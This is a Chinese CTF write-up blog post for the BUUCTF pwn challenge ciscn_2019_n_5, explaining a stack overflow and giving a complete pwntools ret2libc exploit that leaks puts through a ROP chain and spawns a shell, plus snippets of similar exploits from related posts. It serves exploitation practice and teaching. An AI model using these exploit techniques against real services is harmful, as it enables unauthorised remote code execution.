buuctf ciscn_2019_n_5

最新推荐文章于 2025-02-20 15:16:49 发布
最新推荐文章于 2025-02-20 15:16:49 发布
阅读量230 收藏
点赞数 2
CC 4.0 BY-SA版权
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53912227/article/details/145649694

开局:典型的ret2libc,

老规矩,file 文件

64位的小段存储

发现NX unknown(想到了ret2shellcode)

上IDA

发现有个name的全局变量(bss),这个时候就想到用ret2shellcode,但是实际上是不行的,因为这个name的bss不具有x权限

这个时候就可以确定ret2shellcode不行

shift+f12发现没有system和binsh等字符串,因此就需要用到ret2libc,这里的puts正好提前被使用了

下面的exploit如下:

 

from pwn import*
from LibcSearcher import *

sh = process('./a')
sh = remote('node5.buuoj.cn',26924)
elf = ELF('./a')

ret = 0x4004c9
pop_rdi_ret = 0x400713

main = 0x400636

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

sh.recvline()
sh.sendline(b'aaaa')
sh.recvline()
sh.recvline()
payload = b'a'*(0x28) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main)
sh.sendline(payload)
put_add = u64(sh.recvuntil('\n')[:-1].ljust(8,b'\0'))
print(hex(put_add))

libc = LibcSearcher('puts', put_add)
base = put_add - libc.dump('puts')
sys = base + libc.dump('system')
binsh = base + libc.dump('str_bin_sh')

sh.recvline()
sh.sendline(b'aaaa')
sh.recvline()
sh.recvline()

payload1 = b'a' * (0x28) + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(sys)
sh.sendline(payload1)
sh.interactive()

 

qq_53912227
关注
ciscn_2019_n_5
qq_39869547的博客
01-11 1092
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
buuctfciscn_2019_c_1
weixin_54452942的博客
04-18 902
通俗易懂
BUUCTF ciscn_2019_n_5
2401_88087539的博客
01-14 423
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 499
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 929
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 694
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTFciscn_2019_n_1 1
qq_41560595的博客
09-24 4736
这道题是栈溢出题型,又同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3303
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 1072
[buuctf]ciscn_2019_n_5
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 814
[BUUCTF-pwn]——ciscn_2019_n_5 题目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
【CTF】ciscn_2019_n_5
凉水的博客
04-22 1074
题目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 410
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
buuctf_ciscn_2019_n_5
2301_81060697的博客
02-20 329
buuctf
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 1897
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第二次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
华北赛区 hackworld 1
最新发布
03-27
根据提供的引用内容,HackWorld 是**CISCN(全国大学生信息安全竞赛)华北赛区**中的一道经典 Web 类题目,出现在 **2019 年赛题**中,涉及**布尔盲注**和**自动化脚本爆破**技术[^3][^4][^5]。 --- ### 1. 题目...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值